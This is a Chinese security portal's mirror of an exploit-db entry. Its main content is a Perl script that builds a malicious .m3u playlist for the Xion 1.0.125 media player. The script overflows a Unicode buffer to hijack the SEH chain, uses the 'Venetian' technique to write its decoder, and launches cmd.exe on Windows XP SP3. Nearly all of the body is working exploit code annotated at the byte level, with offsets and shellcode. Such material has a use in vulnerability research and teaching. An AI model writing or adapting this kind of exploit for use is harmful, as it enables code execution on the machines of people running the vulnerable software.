首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit
来源:http://www.exploit-db.com 作者:synthetic 发布时间:2018-03-06  
#!/usr/bin/perl
# ########################################################################
# Title:                Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
# Vulnerability Type:   Execute Code, Overflow UTF-16LE buffer, Memory corruption
# Date:                 Feb 18, 2018
# Author:               James Anderson (synthetic)
# Original Advisory:    http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
# Exploit mitigation:   There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
# About:        The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
# Tested on:            Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
# ########################################################################
#                   _   _          _   _     
#   ___ _   _ _ __ | |_| |__   ___| |_(_) ___
#  / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
#  \__ \ |_| | | | | |_| | | |  __/ |_| | (__
#  |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
#   |___/                                        
#
# ########################################################################
                                          
 my $path = "/media/s4/DragonR.m3u";
 
 my $buffer_length = 5000;
 my $suboffset = 0x104;
 my $NOP1 = "\x6F"; # add [edi], ch
 my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx
 
 # [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
 my $crash = "A" x 260;
 # [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
 $crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
 $crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR
 
 my $offset_to_payload = length($crash);
 
 # [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
    # [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
    $crash .= $NOP1; # NOP-eq
    $crash .= "\x6a\x59"; # push 0 # pop ecx
    $crash .= $NOP1; # NOP-eq
    $crash .= "\x41"; # inc ecx
    $crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
    $crash .= $NOP1; # NOP-eq
    $crash .= "\x41"; # inc ecx
    $crash .= "\xC8"; # add al, cl
    $crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;
 
    # [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x3b\x41"; # mov edx, 41003b00
    $crash .= "\x30"; # add [eax],dh        
    $crash .= $NOP1; # NOP-eq
 
    # [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
    $crash .= "\x40"; # inc eax
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\xec\x41"; # mov edx, 4100ec00
    $crash .= "\x30"; # add [eax],dh       
 
    # [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x45\x41"; # mov edx, 41004500
    $crash .= "\x30"; # add [eax],dh
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x46\x41"; # mov edx, 41004600
    $crash .= "\x30"; # add [eax],dh
 
    # [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x68\x41"; # mov edx, 41006800
    $crash .= "\x30"; # add [eax],dh
 
    # [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x78\x41"; # mov edx, 41007800
    $crash .= "\x30"; # add [eax],dh
 
    # [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x2F\x41"; # mov edx, 41002F00
    $crash .= "\x30"; # add [eax],dh
 
    # [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x63\x41"; # mov edx, 41006300
    $crash .= "\x30"; # add [eax],dh
 
    # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x64\x41"; # mov edx, 41006400
    $crash .= "\x30"; # add [eax],dh
 
    # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x8d\x41"; # mov edx, 41008d00
    $crash .= "\x30"; # add [eax],dh
 
    # [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\xf8\x41"; # mov edx, 4100f800
    $crash .= "\x30"; # add [eax],dh
 
    # [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\xb8\x41"; # mov edx, 4100b800
    $crash .= "\x30"; # add [eax],dh
 
    # [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x49\x41"; # mov edx, 41004900
    $crash .= "\x30"; # add [eax],dh
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x4A\x41"; # mov edx, 41004A00
    $crash .= "\x30"; # add [eax],dh
 
    # [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\x77\x41"; # mov edx, 41007700
    $crash .= "\x30"; # add [eax],dh
 
    # [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    $crash .= "\xC8"; # add al, cl # eq eax + 2
    $crash .= $NOP1; # NOP-eq
    $crash .= "\xba\xd0\x41"; # mov edx, 4100d000
    $crash .= "\x30"; # add [eax],dh
 
 # [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
                             # *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
 $crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
 $crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)
 
 
 # [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
my $shellcode =
"\x50". # "\x8b". # # BAD BYTE
    # "\xec". # 0
"\x55". # "\x55".
    # "\x8b". # 0   # BAD BYTE 
"\xec". # "\xec".
    # "\x68". # 0
"\x65". # "\x65".
    # "\x78". # 0
"\x65". # "\x65".
    # "\x2F". # 0
"\x68". # "\x68".
    # "\x63". # 0
"\x6d". # "\x6d".
    # "\x64". # 0
"\x2e". # "\x2e".
    # "\x8d". # 0
"\x45". # "\x45".
    # "\xf8". # 0
"\x50". # "\x50".
    # "\xb8". # 0
"\xc7". # "\xc7".
    # "\x93". # 0   # BAD BYTE 
"\xc2". # "\xc2".
    # "\x77". # 0
"\xff"; # "\xff".
    # "\xd0"; # 0
 
 $crash .= $shellcode;
 
 $crash .= "C" x ($buffer_length - length($crash));
 open(myfile, ">$path");
 print myfile $crash;
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Papenmeier WiFi Baby Monitor F
·Dup Scout Enterprise 10.5.12 -
·NETGEAR Magic telnetd Enabler
·Sophos UTM 9.410 - 'loginuser'
·DualDesk 20 - 'Proxy.exe' Deni
·ActivePDF Toolkit < 8.1.0.1902
·SEGGER embOS/IP FTP Server 3.2
·Tenda AC15 Router - Pe-authent
·IrfanView 4.50 Email Plugin -
·Memcached - 'memcrashed' Denia
·IrfanView 4.44 Email Plugin -
·Chrome V8 JIT GetSpecializatio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved